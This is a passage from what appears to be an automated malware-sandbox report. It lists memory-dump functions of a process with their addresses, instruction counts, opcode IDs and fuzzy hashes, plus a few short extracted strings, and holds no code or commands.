                    • Opcode Fuzzy Hash: 1e2ffe0461bc504c522382719efae6efdce49eea17c7985c57cf99ca949e70c5
                    • Instruction Fuzzy Hash: EB913C71D1995A9FEB98EB68C4A57B8B7B1FF55340F1440B9C00DE7292CF386884CB15
                    Function 00007FF848F14345 Relevance: .2, Instructions: 231COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ba6f3d167fa3a229c1f1ed4e7ba5141961bd1e7418e9cf038794e1496ff5482
                    • Instruction ID: e0638f01c382cb243a3a8219f9dad92536828e073287b58cb08932322be421d0
                    • Opcode Fuzzy Hash: 7ba6f3d167fa3a229c1f1ed4e7ba5141961bd1e7418e9cf038794e1496ff5482
                    • Instruction Fuzzy Hash: AF816872C1E6C25FE315AF2868550B97FA2FFB2794F1800BBD488871C7CE196C098399
                    Function 00007FF848F10DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5186797b88237c1d7a64e49409dfea861d8ef624caf753977b99e4513e566b7f
                    • Instruction ID: 3666acc0453a35e984241448cfe222cc50d48bd9a9f5c924d9aa4f3952feea90
                    • Opcode Fuzzy Hash: 5186797b88237c1d7a64e49409dfea861d8ef624caf753977b99e4513e566b7f
                    • Instruction Fuzzy Hash: 97715A30A1995E8FDB84FF58C895AEAB7B1FF98340F1445B5D40DD7296CE38A881CB90
                    Function 00007FF848F108B1 Relevance: .2, Instructions: 210COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efa4e222f5fecabf9d95a316fada456221d0714fa056db3da008dbffe70d7328
                    • Instruction ID: b702826f337adf729cfe6aae7bdba541c6fd9c914edc64bdc95d537f269f3c9d
                    • Opcode Fuzzy Hash: efa4e222f5fecabf9d95a316fada456221d0714fa056db3da008dbffe70d7328
                    • Instruction Fuzzy Hash: B0618E3190CA6E8FEB98FF68C8986A9B7A1FF98341F54017AD409D72D1DF35A841CB44
                    Function 00007FF848F14F5C Relevance: .2, Instructions: 193COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c23c07230e6cbbe781eeb3ba58c90118906902b86b88ceba837f20bd3c785b4
                    • Instruction ID: 819e702a3b66c75975524e098952a17fc5c2030e1e42b0abcc2ae9fd865dbf89
                    • Opcode Fuzzy Hash: 7c23c07230e6cbbe781eeb3ba58c90118906902b86b88ceba837f20bd3c785b4
                    • Instruction Fuzzy Hash: 3771D570D19A2C9FDBA5EF59D894BE9B7B1FB98300F5001AAD00DE7291DB356A84CB40
                    Function 00007FF848F160C5 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f7c14b903156436b6711427dc2e46102d1389e13be7d724d156556fa6e588e4
                    • Instruction ID: 731c868e30474bd142817d095e065b0341242f34438314dc57734c3739285a25
                    • Opcode Fuzzy Hash: 1f7c14b903156436b6711427dc2e46102d1389e13be7d724d156556fa6e588e4
                    • Instruction Fuzzy Hash: 37518971D0C6598FEB95EB6888943A8BBB1FF95340F4441BAC00AE72C2DB3C6C85CB45
                    Function 00007FF848F14611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dbe318ff12f631d0c21a720702e441b76796cd8e6af5cbdfba3897502e718644
                    • Instruction ID: 1e08346dd42c155d2811165f14892a55ad42d07c9ed4aa6952933dacbd1a469e
                    • Opcode Fuzzy Hash: dbe318ff12f631d0c21a720702e441b76796cd8e6af5cbdfba3897502e718644
                    • Instruction Fuzzy Hash: EB51A370D19A1D9FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB346981CB44
                    Function 00007FF848F10AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 358189c5a58763beec3f9c9a8d81e58a285f07ba99d6a6c4485572b498f2ef0b
                    • Instruction ID: 012d94bb508c2f0d532880340ac8cb2a0652b7d0b208a198e25e2421215fc8f6
                    • Opcode Fuzzy Hash: 358189c5a58763beec3f9c9a8d81e58a285f07ba99d6a6c4485572b498f2ef0b
                    • Instruction Fuzzy Hash: 7D51D870E18A5D8FDF98EF98C8996EDBBB1FFA8341F14012AD409E7295CB349845CB44
                    Function 00007FF848F138B8 Relevance: .2, Instructions: 151COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 55be005bdc0c5df6ec3cff94c6b703d8f7a7a80b53600df338714e570651562e
                    • Instruction ID: 6153e2abb1f9cf7610517f228477526fefb12d2e627d5c7865e568cc09b799d7
                    • Opcode Fuzzy Hash: 55be005bdc0c5df6ec3cff94c6b703d8f7a7a80b53600df338714e570651562e
                    • Instruction Fuzzy Hash: 5D416970E1991D9FDB48EF98D855AEEBBB1FF58340F10017AE00AE7281DB39AD018B55
                    Function 00007FF848F167ED Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 405f16443acd31a66301ae1eeacd71663a30070867507d18d9c859125108f539
                    • Instruction ID: f99ca018c9f55b576131898637b2d5b4fc26fef5002610c6e9cc78e329b62a68
                    • Opcode Fuzzy Hash: 405f16443acd31a66301ae1eeacd71663a30070867507d18d9c859125108f539
                    • Instruction Fuzzy Hash: 2A516831C0D68A8FDB55AB6898682FE7BB0FF16311F1501BAD004E71D2EB385E48CB52
                    Function 00007FF848F1535F Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b0c40b8fc046cbf5344247d8b795eefb6c406f72ddbe8f6fc67360cbee1414d1
                    • Instruction ID: fd29076c6d0f94e6000e5a2a14f81584e080d6637f94685ce440acc1cba3ffa2
                    • Opcode Fuzzy Hash: b0c40b8fc046cbf5344247d8b795eefb6c406f72ddbe8f6fc67360cbee1414d1
                    • Instruction Fuzzy Hash: 1F41D670D1895D9FDF94EBA8D895AACBBF1FF68341F50016AD00DE7296DB34A881CB40
                    Function 00007FF848F10C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb9a2065c286d866379d6be0577b5fdbaf73c44c34b1c1be76d673c3763ef8bd
                    • Instruction ID: b804836001edc01cbad77c8af60b2eeb02406ed955d02d8cfeaa49a45b20c789
                    • Opcode Fuzzy Hash: eb9a2065c286d866379d6be0577b5fdbaf73c44c34b1c1be76d673c3763ef8bd
                    • Instruction Fuzzy Hash: 33411471C0962D8FDB90EFA8D4486EDBBB0FF95340F50047AE409E3292DB78A945CB80
                    Function 00007FF848F11521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction ID: 4f5f67aa0fe19116667d4f4be1ed83b827f0af9d96e2c2f638db2a949ad38d79
                    • Opcode Fuzzy Hash: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction Fuzzy Hash: 9541E534A1891D8FDB98EB58C895BACB7F1FB58304F5440A9D04EE3692DF75AD818B40
                    Function 00007FF848F10AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9df1d85610e7e0763f4968e735b984e9b283a056b08c12c69e51ebb0accf5c7
                    • Instruction ID: 79eb3bd534cc0adaffbf55210ad0169a34fa37c003384ac32fdd1ae6a5286570
                    • Opcode Fuzzy Hash: e9df1d85610e7e0763f4968e735b984e9b283a056b08c12c69e51ebb0accf5c7
                    • Instruction Fuzzy Hash: 5631C970E1891D8FDF94EF58D495BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F14BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 13ab5c00437e0192048c87fcde73f800407aa092a1720af376731521a7edec77
                    • Instruction ID: ff62b9373590e7e9433c5ff41f42b26afdf0e2b7bad6d03e06815af4da1e99a0
                    • Opcode Fuzzy Hash: 13ab5c00437e0192048c87fcde73f800407aa092a1720af376731521a7edec77
                    • Instruction Fuzzy Hash: FF416870D096598FEB56EFA4C8596EDBBF2FF99300F5001BAD049E7292CB395981CB40
                    Function 00007FF848F11129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ea89a88cfba50b59ce5e455b6fa8ff35ac559b793726ab6efcaede9d8fb3bed1
                    • Instruction ID: d8f125394193db9e941a95dbf8c0652119626550af3706bea5b770fb58ce3129
                    • Opcode Fuzzy Hash: ea89a88cfba50b59ce5e455b6fa8ff35ac559b793726ab6efcaede9d8fb3bed1
                    • Instruction Fuzzy Hash: 80217C3190895D9FDF81EF68D859AEDBBF5FF58310F00016AE408E3292CB249841C790
                    Function 00007FF848F13A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction ID: 9a1a7894a0cd7f8c77d8ccab3712a03feb300713de9c228ae97812b78f198598
                    • Opcode Fuzzy Hash: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction Fuzzy Hash: CD21AE31E0DA8A8FE799EB288C647A57BA0FF51341F0804B9D088D71D2DF796C45CB05
                    Function 00007FF848F14555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a804ecb24c9296e285140b0324a8e40e263a6faff61955bf92ba465bcc8cc98f
                    • Instruction ID: a937479c799372b6f9f876a68d6fcbaef08a92f380485857ad220a863d94e3fd
                    • Opcode Fuzzy Hash: a804ecb24c9296e285140b0324a8e40e263a6faff61955bf92ba465bcc8cc98f
                    • Instruction Fuzzy Hash: 4031D17181E6C94FE755EF2898641A97FB2FF95340F4801BAE808C72D7CA285948C795
                    Function 00007FF848F13F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction ID: 03fdd4213e8383bcaa0474391f955f8fcc6c2cf9dc7c183b60786606ab204c12
                    • Opcode Fuzzy Hash: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction Fuzzy Hash: 48314630D1961A8FE7A8EB28C8593B9B3B2EF94750F1005B9D45DD32D2CF39A8818B44
                    Function 00007FF848F13F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2af2166aece4f07580d22b63f32c980f95b596ec39ea0ca64a06c91e5fcdf616
                    • Instruction ID: ed5e5206ad14ce1d0ccd3b8641a0fb96afb6e111f8f2715060a4d0803c538994
                    • Opcode Fuzzy Hash: 2af2166aece4f07580d22b63f32c980f95b596ec39ea0ca64a06c91e5fcdf616
                    • Instruction Fuzzy Hash: C221BD31D0D20A8EE768AF28C8556B9B3B1EF94790F100079D01D932C2CF39AC81CB08
                    Function 00007FF848F11048 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8fe7fde6d6743928cd559205bfe78439167d5afe8d76363795189b5e9c7a2bf
                    • Instruction ID: 8b718a0738888807a531490dc9773a6cea41e0480ebadc127dde46f0e9c794b1
                    • Opcode Fuzzy Hash: d8fe7fde6d6743928cd559205bfe78439167d5afe8d76363795189b5e9c7a2bf
                    • Instruction Fuzzy Hash: BB21B270A1890D9FCF84EF48C495EEEBBB1FF68301F100169E509E3255CB34E8418B84
                    Function 00007FF848F13F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction ID: b58adcbf66df8b035278004d363a85f4a97932d9f5701317c471a47025363d79
                    • Opcode Fuzzy Hash: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction Fuzzy Hash: 3F215B30D0E7494FE769AB68C8197B9BBB1EF95750F0404BAD009D72D2CE389884CB55
                    Function 00007FF848F13FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction ID: d2fc57227c781dc3a8bcdd7eb0a1dc8404783925b6c8a6c3a2a2c3d412c3f078
                    • Opcode Fuzzy Hash: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction Fuzzy Hash: 56119D3090E78A4FE766AB7488247B97BB1EF86750F0804BAD049D72D3CE289C45C756
                    Function 00007FF848F13F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction ID: d27ae30db00bd6653476d3d59dbfec71053d13b77f9ee969b722d2f8fabf74cb
                    • Opcode Fuzzy Hash: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction Fuzzy Hash: EF119E30C1D60A9FE768AB28C4097BAB6B1EF95790F101539D40DD32C1CF39AC448655
                    Function 00007FF848F13F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction ID: a8e4e909e57b09cee0d1eea9ecb164f6ca637da474f74849cd2534ba117fc081
                    • Opcode Fuzzy Hash: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction Fuzzy Hash: E2113A30D1D64A8EE7A8AF28C4153B966B2EF99790F141439D44D932C6CF39AC81C708
                    Function 00007FF848F13F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction ID: e72a59205f33e2cea0214835ddc57ffd7498614fe7c6ca4d75646f0c0090f3bc
                    • Opcode Fuzzy Hash: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction Fuzzy Hash: A0118B34D1DA4A8EE7A8AF28C4193B9B7B2EF98750F140439D40DE32C2CF39AC418748
                    Function 00007FF848F13EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction ID: be6b418aafbbe60c58aea1e96f99f22a0ab15b189964b0f22227d7b8fb51b35e
                    • Opcode Fuzzy Hash: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction Fuzzy Hash: C211A030C0E74A8FE769AF28C5193B9BBB1EF86750F041479D459D72D2CF39A8408705
                    Function 00007FF848F13F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction ID: 7e8a79d15363921daa08b58405ea7322962f6fb13c6a39fec04dbcc8e7d1a8f5
                    • Opcode Fuzzy Hash: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction Fuzzy Hash: E7016970D0E64A8FE768AF24C5193B9BBB2EF89B50F041879D009E72D2CF39A8419715
                    Function 00007FF848F16680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction ID: a19397ef35928710980c3960567866ef36215dedabbdea48768eaadaab9cfb7d
                    • Opcode Fuzzy Hash: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction Fuzzy Hash: B2018C31D4894C8FCB55EF5AAC002D977B4FB9A318F00126AD45CD7180E7759A9AC745
                    Function 00007FF848F110EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000011.00000002.2185182701.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_17_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 310dc1e8405177ed607614cece71bd594a61f921676af7b0115392509ce35525
                    • Instruction ID: 1f156f5144f4ee7980bd43c9b75511877568cb9a782f8e1b089b19db2303ce63
                    • Opcode Fuzzy Hash: 310dc1e8405177ed607614cece71bd594a61f921676af7b0115392509ce35525
                    • Instruction Fuzzy Hash: C1E09236D0C94D4FEB90AF68A8066A5FBA4FB86308F000069E55CD3192C7259995C385

                    Executed Functions

                    Function 00007FF848F41EC3 Relevance: 16.5, Strings: 12, Instructions: 1497COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$H$[$[$\$]$]$u${${$}$}
                    • API String ID: 0-2063274034
                    • Opcode ID: b96a03e6897c8d0ababa28c7a0d41045c712ae855cf64ab92ca389886aaffca1
                    • Instruction ID: bd6ded145e4fab86db04cbfcf848c378e2bd64a1bc1eaf7c0251ef5941a86f84
                    • Opcode Fuzzy Hash: b96a03e6897c8d0ababa28c7a0d41045c712ae855cf64ab92ca389886aaffca1
                    • Instruction Fuzzy Hash: 04D2B470D196298FDBA8EF18C894BA9B7B1FF68741F5041FAD00DA3291CB356A81CF54
                    Function 00007FF848F41751 Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: @JH
                    • API String ID: 0-3316324915
                    • Opcode ID: 1c31f547ddd40375baaf5905e7851556db143b54521dbf4d43fd055fa244647e
                    • Instruction ID: 410a535b047dd52bdc8ea2a237498479b13fe063a63d8fd524da91521907ee4a
                    • Opcode Fuzzy Hash: 1c31f547ddd40375baaf5905e7851556db143b54521dbf4d43fd055fa244647e
                    • Instruction Fuzzy Hash: 7BE17971D196A99FEB58EB68C8657F8BBF1FF15740F1400BAD009E3292CB386885CB15
                    Function 00007FF848F4124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: c0896d4b5e3b13923df4b4bb82a6af20e1f5eb2ce10ad52c8b34d60382e76a8e
                    • Instruction ID: 0132b87e31e4fa4a345be133dc75123a6ec117c7ce13b0065b428efbf9aa780f
                    • Opcode Fuzzy Hash: c0896d4b5e3b13923df4b4bb82a6af20e1f5eb2ce10ad52c8b34d60382e76a8e
                    • Instruction Fuzzy Hash: 14A17234A18A1D8FDB98EF58C894BA8B7F1FF69301F4541A9D00DE72A5DB74AD81CB40
                    Function 00007FF848F409D3 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000012.00000002.2245203525.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_7ff848f40000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: f58d9c3004d45446559dbf1d0e5b29f008a95059818cbcd513b5bf1ed97e1410
                    • Instruction ID: af8e8fa242a7c49952cd568045c4b8c2dc108cc167ad715ad33e04850979a52a
                    • Opcode Fuzzy Hash: f58d9c3004d45446559dbf1d0e5b29f008a95059818cbcd513b5bf1ed97e1410
